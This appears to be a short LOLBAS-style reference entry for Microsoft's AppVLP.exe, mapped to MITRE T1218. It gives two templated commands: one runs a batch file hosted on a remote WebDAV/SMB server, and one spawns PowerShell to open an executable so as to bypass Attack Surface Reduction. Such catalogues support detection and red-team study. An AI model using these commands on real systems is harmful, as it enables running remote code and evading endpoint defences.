Appvlp.exe

Application Virtualization Utility Included with Microsoft Office 2016

Execute

Execution of BAT file hosted on Webdav server.

AppVLP.exe {PATH_SMB:.bat}

Executes .bat file through AppVLP.exe — MITRE: T1218 — Privileges: User

Local execution of process bypassing Attack Surface Reduction (ASR).

AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('{PATH:.exe}','', '', 'open', 1)"

Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. — MITRE: T1218 — Privileges: User